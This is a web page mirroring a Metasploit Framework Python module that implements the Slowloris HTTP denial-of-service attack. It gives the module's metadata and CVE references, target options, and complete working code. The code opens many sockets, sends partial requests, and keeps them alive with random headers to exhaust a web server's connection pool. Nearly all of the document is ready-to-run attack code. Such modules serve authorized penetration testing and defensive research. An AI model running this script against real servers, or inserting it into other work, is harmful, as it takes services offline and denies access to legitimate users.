CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/slowloris.py
Views: 11784
1
#!/usr/bin/env python3

2


3
import random

4
import socket

5
import ssl

6
import string

7
import time

8


9
from metasploit import module

10


11
metadata = {

12
    'name': 'Slowloris Denial of Service Attack',

13
    'description': '''

14
        Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.

15
        It accomplishes this by opening connections to the target web server and sending a partial request.

16
        Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request.

17
        Affected servers will keep these connections open, filling their maximum concurrent connection pool,

18
        eventually denying additional connection attempts from clients.

19
     ''',

20
    'authors': [

21
        'RSnake',  # Vulnerability disclosure

22
        'Gokberk Yaltirakli',  # Simple slowloris in Python

23
        'Daniel Teixeira',  # Metasploit module (Ruby)

24
        'Matthew Kienow <matthew_kienow[AT]rapid7.com>'  # Metasploit external module (Python)

25
    ],

26
    'date': '2009-06-17',

27
    'references': [

28
        {'type': 'cve', 'ref': '2007-6750'},

29
        {'type': 'cve', 'ref': '2010-2227'},

30
        {'type': 'edb', 'ref': '8976'},

31
        {'type': 'url', 'ref': 'https://github.com/gkbrk/slowloris'}

32
     ],

33
    'type': 'dos',

34
    'options': {

35
        'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},

36
        'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 80},

37
        'sockets': {'type': 'int', 'description': 'The number of sockets to use in the attack', 'required': True, 'default': 150},

38
        'delay': {'type': 'int', 'description': 'The delay between sending keep-alive headers', 'required': True, 'default': 15},

39
        'ssl': {'type': 'bool', 'description': 'Negotiate SSL/TLS for outgoing connections', 'required': True, 'default': False},

40
        'rand_user_agent': {'type': 'bool', 'description': 'Randomizes user-agent with each request', 'required': True, 'default': True}

41
     }}

42


43
list_of_sockets = []

44
user_agents = [

45
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",

46
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",

47
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",

48
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",

49
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",

50
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",

51
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",

52
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",

53
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",

54
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",

55
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",

56
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",

57
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",

58
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",

59
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",

60
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",

61
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",

62
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",

63
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",

64
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",

65
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",

66
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",

67
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",

68
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",

69
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",

70
]

71


72


73
def create_random_header_name(size=8, seq=string.ascii_uppercase + string.ascii_lowercase):

74
    return ''.join(random.choice(seq) for _ in range(size))

75


76


77
def init_socket(host, port, use_ssl=False, rand_user_agent=True):

78
    s = socket.create_connection((host, port), 10)

79
    s.settimeout(4)

80


81
    if use_ssl:

82
        s = ssl.wrap_socket(s)

83


84
    s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))

85


86
    if rand_user_agent:

87
        s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8"))

88
    else:

89
        s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8"))

90


91
    s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))

92
    return s

93


94


95
def run(args):

96
    host = args['rhost']

97
    port = int(args['rport'])

98
    use_ssl = args['ssl'] == "true"

99
    rand_user_agent = args['rand_user_agent'] == "true"

100
    socket_count = int(args['sockets'])

101
    delay = int(args['delay'])

102


103
    module.log("Attacking %s with %s sockets" % (host, socket_count), 'info')

104


105
    module.log("Creating sockets...", 'info')

106
    for i in range(socket_count):

107
        try:

108
            module.log("Creating socket number %s" % i, 'debug')

109
            s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent)

110
        except socket.error:

111
            break

112
        list_of_sockets.append(s)

113


114
    while True:

115
        module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info')

116
        for s in list(list_of_sockets):

117
            try:

118
                s.send("{}: {}\r\n".format(create_random_header_name(random.randint(8, 16)),

119
                                           random.randint(1, 5000)).encode("utf-8"))

120


121
            except socket.error:

122
                list_of_sockets.remove(s)

123


124
        for _ in range(socket_count - len(list_of_sockets)):

125
            module.log("Recreating socket...", 'debug')

126
            try:

127
                s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent)

128
                if s:

129
                    list_of_sockets.append(s)

130
            except socket.error:

131
                break

132
        time.sleep(delay)

133


134


135
if __name__ == "__main__":

136
    module.run(metadata, run)

137


138